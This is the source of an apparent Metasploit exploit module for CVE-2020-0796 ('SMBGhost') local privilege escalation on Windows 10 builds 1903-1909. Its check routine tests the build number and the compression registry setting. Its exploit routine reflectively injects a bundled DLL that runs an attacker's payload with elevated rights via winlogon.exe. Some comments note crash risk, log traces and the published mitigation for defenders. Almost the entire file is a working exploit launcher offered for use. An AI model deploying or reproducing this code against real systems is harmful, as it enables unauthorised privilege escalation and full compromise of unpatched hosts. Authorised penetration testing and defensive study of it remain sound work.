Path: blob/master/modules/exploits/windows/local/cve_2020_0796_smbghost.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Local privilege-escalation module for CVE-2020-0796 (AKA "SMBGhost" / "CoronaBlue").
#
# For defenders, the module spells out its own preconditions in `check`: the host
# is only reported as affected when the session is Windows 10 build 1903-1909 and
# the LanmanServer `DisableCompression` registry value is absent or zero. The
# metadata below also records that an attempt can crash the OS (CRASH_OS_RESTARTS)
# and that use leaves indicators in logs (IOC_IN_LOGS). The exploitation itself is
# carried out by a bundled DLL under the framework data directory; this Ruby code
# only gates and launches it.
class MetasploitModule < Msf::Exploit::Local
  Rank = GoodRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::ReflectiveDLLInjection
  # AutoCheck runs `check` before `exploit`, so the precondition checks below
  # gate the DLL injection unless the operator overrides the check result.
  prepend Msf::Exploit::Remote::AutoCheck

  # Registers module metadata (name, authors, target, references, notes) with the framework.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'SMBv3 Compression Buffer Overflow',
          'Description' => %q{
            A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to
            execute code on a vulnerable server. This local exploit implementation leverages this flaw to elevate itself
            before injecting a payload into winlogon.exe.
          },
          'License' => MSF_LICENSE,
          'Author' => [
            'Daniel García Gutiérrez', # original LPE exploit
            'Manuel Blanco Parajón', # original LPE exploit
            'Spencer McIntyre' # metasploit module
          ],
          'Arch' => [ ARCH_X86, ARCH_X64 ],
          'Platform' => 'win',
          'SessionTypes' => [ 'meterpreter' ],
          'DefaultOptions' => {
            'EXITFUNC' => 'thread'
          },
          # Only the x64 target is active; the x86 entry is commented out and no
          # x86 DLL is referenced in `exploit` below.
          'Targets' => [
            # [ 'Windows 10 x86', { 'Arch' => ARCH_X86 } ],
            [ 'Windows 10 v1903-1909 x64', { 'Arch' => ARCH_X64 } ]
          ],
          'Payload' => {
            'DisableNops' => true
          },
          'References' => [
            [ 'CVE', '2020-0796' ],
            [ 'URL', 'https://github.com/danigargu/CVE-2020-0796' ],
            [ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005' ]
          ],
          'DisclosureDate' => '2020-03-13',
          'DefaultTarget' => 0,
          'Notes' => {
            'AKA' => [ 'SMBGhost', 'CoronaBlue' ],
            # A failed attempt can take the OS down; responders may see an
            # unexplained reboot as the first sign of an attempt.
            'Stability' => [ CRASH_OS_RESTARTS, ],
            # Use is expected to leave traces in host logs.
            'SideEffects' => [ IOC_IN_LOGS ],
            'Reliability' => [ REPEATABLE_SESSION, ],
            'RelatedModules' => [ 'exploit/windows/smb/cve_2020_0796_smbghost' ]
          }
        }
      )
    )
  end

  # Determines whether the session host looks affected, without attempting exploitation.
  #
  # @return [Msf::Exploit::CheckCode] Safe when any precondition fails
  #   (non-Windows, build outside 1903-1909, compression disabled), Appears otherwise
  def check
    if session.platform != 'windows'
      # Non-Windows systems are definitely not affected.
      return Exploit::CheckCode::Safe
    end

    version = get_version_info
    vprint_status("Windows Build Number = #{version.build_number}")
    # see https://docs.microsoft.com/en-us/windows/release-information/
    # Only builds in the inclusive 1903..1909 range are in scope.
    unless version.build_number.between?(Msf::WindowsVersion::Win10_1903, Msf::WindowsVersion::Win10_1909)
      print_error('The exploit only supports Windows 10 versions 1903 - 1909')
      return CheckCode::Safe
    end

    # Mitigation hook: a non-zero DisableCompression value under the LanmanServer
    # parameters key (the workaround published in the ADV200005 advisory referenced
    # above) makes the host report as Safe. A missing value (nil) is treated the
    # same as 0, i.e. compression enabled.
    disable_compression = registry_getvaldata('HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters', 'DisableCompression')
    if !disable_compression.nil? && disable_compression != 0
      print_error('The exploit requires compression to be enabled')
      return CheckCode::Safe
    end

    # NOTE(review): `Exploit::CheckCode::Safe` above and `CheckCode::Safe` here
    # presumably resolve to the same constant; only the spelling is inconsistent.
    CheckCode::Appears
  end

  # Runs the local privilege escalation.
  #
  # Aborts via fail_with when the session is already elevated or when the host
  # architecture, session architecture and selected target do not line up;
  # otherwise reflectively loads the bundled x64 DLL and hands it the encoded payload.
  def exploit
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end

    # Architecture guards: an x86 session on an x64 host (WOW64) is rejected, as is
    # any mismatch between the host architecture and the selected target's architecture.
    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
    elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
    elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64
      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
    end

    print_status('Reflectively injecting the exploit DLL and executing it...')

    # invoke the exploit, passing in the address of the payload that
    # we want invoked on successful exploitation.
    # The argument handed to the DLL is the payload length packed as a
    # little-endian unsigned int ('I<', typically 4 bytes) followed by the payload
    # bytes. payload.encoded is read exactly once so the length prefix and the
    # bytes that follow describe the same encoding.
    encoded_payload = payload.encoded
    execute_dll(
      # Only the x64 DLL is referenced, matching the single active target above.
      ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0796', 'CVE-2020-0796.x64.dll'),
      [encoded_payload.length].pack('I<') + encoded_payload
    )

    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
  end
end